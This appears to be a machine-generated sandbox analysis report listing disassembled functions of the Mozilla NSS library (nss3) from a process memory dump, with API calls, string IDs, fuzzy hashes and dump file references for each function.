                                                                                                                                                                                                                          • Opcode ID: c8e3a92b7501b32e93f93e3b073d089d6788a780e64dc8d56a4a4931f53d352c
                                                                                                                                                                                                                          • Instruction ID: b8925d8819e3b706d61aeec6b41e1ca8f1732d4138f28589eb0e175b0598854e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8e3a92b7501b32e93f93e3b073d089d6788a780e64dc8d56a4a4931f53d352c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD517A74A046248FDF00EF78C888E59BBF0BF4A318F065569DC499BB05EB31E885CB95
                                                                                                                                                                                                                          Function 6C587CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C587CE0
                                                                                                                                                                                                                            • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587D36
                                                                                                                                                                                                                          • PR_Realloc.NSS3(?,00000080), ref: 6C587D6D
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C587D8B
                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C587DC2
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587DD8
                                                                                                                                                                                                                          • malloc.MOZGLUE(00000080), ref: 6C587DF8
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C587E06
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                                                                          • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                                                                          • API String ID: 530461531-3274975309
                                                                                                                                                                                                                          • Opcode ID: d3050562fcd0ebb0cc78d85b1e7abb902b50b99e9c7d7125669b0829c451064f
                                                                                                                                                                                                                          • Instruction ID: f6354612a385c99da8c9a8ec2a00620b89f0394da6adc8833d0d5b9781249cd5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3050562fcd0ebb0cc78d85b1e7abb902b50b99e9c7d7125669b0829c451064f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4241C3B1A022119FDB04CF29CC80D6A37B6FF84358B29496CF81A8BB51D731ED01CBA1
                                                                                                                                                                                                                          Function 6C587E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587E37
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6C587E46
                                                                                                                                                                                                                            • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
                                                                                                                                                                                                                            • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
                                                                                                                                                                                                                            • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
                                                                                                                                                                                                                            • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
                                                                                                                                                                                                                          • PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6C587EAF
                                                                                                                                                                                                                          • PR_ImportFile.NSS3(?), ref: 6C587ECF
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C587ED6
                                                                                                                                                                                                                          • PR_ImportTCPSocket.NSS3(?), ref: 6C587F01
                                                                                                                                                                                                                          • PR_ImportUDPSocket.NSS3(?,?), ref: 6C587F0B
                                                                                                                                                                                                                          • PR_ImportPipe.NSS3(?,?,?), ref: 6C587F15
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
                                                                                                                                                                                                                          • String ID: %d:0x%lx$NSPR_INHERIT_FDS
                                                                                                                                                                                                                          • API String ID: 2743735569-629032437
                                                                                                                                                                                                                          • Opcode ID: eda0c8cf40778648ae3510c23005af5d62f38d23fcf83ccc6233bd39a0db5c4b
                                                                                                                                                                                                                          • Instruction ID: dfebf59d2f48e88393d07e76bbcf7c94d7337ba7d5f12e8ba59f03f43e99b080
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eda0c8cf40778648ae3510c23005af5d62f38d23fcf83ccc6233bd39a0db5c4b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF31E171B05125DBEB00DF79CC40AABBBA9AB46388F200965F855A7B11E7719D04CBA2
                                                                                                                                                                                                                          Function 6C494E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C494E90
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C494EA9
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C494EC6
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C494EDF
                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3 ref: 6C494EF8
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C494F05
                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C494F13
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C494F3A
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                                                                                                                          • String ID: bUIl$bUIl
                                                                                                                                                                                                                          • API String ID: 326028414-2371435661
                                                                                                                                                                                                                          • Opcode ID: 5f020c839b3cd148a8f486f4a7314b6f3f6f527f1a39d38ae659126b4dae4c24
                                                                                                                                                                                                                          • Instruction ID: c9f606869b076449055570b3088209b3e66325b79e15129eac9c0d28ceb60624
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f020c839b3cd148a8f486f4a7314b6f3f6f527f1a39d38ae659126b4dae4c24
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9412BB4A04A15DFCB00EF68C48496ABBF0FF49354B028669EC599B714EB30E855CBD5
                                                                                                                                                                                                                          Function 6C4BECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C4BDE64), ref: 6C4BED0C
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4BED22
                                                                                                                                                                                                                            • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C4BED4A
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C4BED6B
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4BED38
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C4BED52
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4BED83
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C4BED95
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C4BED9D
                                                                                                                                                                                                                            • Part of subcall function 6C4D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C4D127C,00000000,00000000,00000000), ref: 6C4D650E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                          • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                          • Opcode ID: 702465069a302d6b785187ece1a1d88381492bf7c3609bc2c5d1d9b35f99302f
                                                                                                                                                                                                                          • Instruction ID: cc12123f169d1b21b0e0e741964f01e7a9e5db5589837a6bfbec65452a74df62
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 702465069a302d6b785187ece1a1d88381492bf7c3609bc2c5d1d9b35f99302f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85118B7590020667D700E625AC90FBB727CEF8120DF020868E801B2F40F7B4B50D86EB
                                                                                                                                                                                                                          Function 6C580EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Aborting,?,6C462357), ref: 6C580EB8
                                                                                                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C462357), ref: 6C580EC0
                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C580EE6
                                                                                                                                                                                                                            • Part of subcall function 6C5809D0: PR_Now.NSS3 ref: 6C580A22
                                                                                                                                                                                                                            • Part of subcall function 6C5809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C580A35
                                                                                                                                                                                                                            • Part of subcall function 6C5809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C580A66
                                                                                                                                                                                                                            • Part of subcall function 6C5809D0: PR_GetCurrentThread.NSS3 ref: 6C580A70
                                                                                                                                                                                                                            • Part of subcall function 6C5809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C580A9D
                                                                                                                                                                                                                            • Part of subcall function 6C5809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C580AC8
                                                                                                                                                                                                                            • Part of subcall function 6C5809D0: PR_vsmprintf.NSS3(?,?), ref: 6C580AE8
                                                                                                                                                                                                                            • Part of subcall function 6C5809D0: EnterCriticalSection.KERNEL32(?), ref: 6C580B19
                                                                                                                                                                                                                            • Part of subcall function 6C5809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C580B48
                                                                                                                                                                                                                            • Part of subcall function 6C5809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C580C76
                                                                                                                                                                                                                            • Part of subcall function 6C5809D0: PR_LogFlush.NSS3 ref: 6C580C7E
                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C580EFA
                                                                                                                                                                                                                            • Part of subcall function 6C46AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C46AF0E
                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F16
                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F1C
                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F25
                                                                                                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F2B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                                                                          • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                          • API String ID: 3905088656-1374795319
                                                                                                                                                                                                                          • Opcode ID: 4648f7d73904939644803dd163787ecd8ef827bec4fb0555afde69342f883115
                                                                                                                                                                                                                          • Instruction ID: 0e80c764fd66bfc401cedd6e8ac79370ce27e7d9d3b2f617fb10b589658872d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4648f7d73904939644803dd163787ecd8ef827bec4fb0555afde69342f883115
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0F0AFB99001547BDA007BA1DC4ACAB3E2DEF82368F044028FD0956A02DB36FA5596F6
                                                                                                                                                                                                                          Function 6C4E4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6C4E4DCB
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C4E4DE1
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C4E4DFF
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4E4E59
                                                                                                                                                                                                                            • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C5A300C,00000000), ref: 6C4E4EB8
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C4E4EFF
                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C4E4F56
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4E521A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1025791883-0
                                                                                                                                                                                                                          • Opcode ID: 59f1729dfe0e17cb81884145c6c4aec1845ee575a68e2ac7cdaa57ebf7118773
                                                                                                                                                                                                                          • Instruction ID: 7200ed4900cee7a8e74846b1faff37a26b5a6ccb87e9782ba7ef5fd523b6a65f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59f1729dfe0e17cb81884145c6c4aec1845ee575a68e2ac7cdaa57ebf7118773
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10F17D71E01205CBDB04CF98D840FADB7B2BF4835AF264169E915AB781E775E982CB90
                                                                                                                                                                                                                          Function 6C474FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_NewLock.NSS3(00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C47502A
                                                                                                                                                                                                                          • PR_NewLock.NSS3(00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C475034
                                                                                                                                                                                                                          • PL_NewHashTable.NSS3(00000000,6C4CFE80,6C4CFD30,6C51C350,00000000,00000000,00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C475055
                                                                                                                                                                                                                          • PL_NewHashTable.NSS3(00000000,6C4CFE80,6C4CFD30,6C51C350,00000000,00000000,?,00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C47506D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HashLockTable
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3862423791-0
                                                                                                                                                                                                                          • Opcode ID: 974718ba33bc2a20290f0915e30813f6a53181eed7de37258dc2fcaf703c0293
                                                                                                                                                                                                                          • Instruction ID: 73ab1c6ff0f2d7e4d38279a6e550a56e3a93f3f21e444921036baac238e563c4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 974718ba33bc2a20290f0915e30813f6a53181eed7de37258dc2fcaf703c0293
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A731A6B1B053609BEB20DAA58D4CF9737B8EB52349F028114E9158B740D375AD84CBFE
                                                                                                                                                                                                                          Function 6C412E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C412F3D
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C412FB9
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C413005
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C4130EE
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C413131
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C413178
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
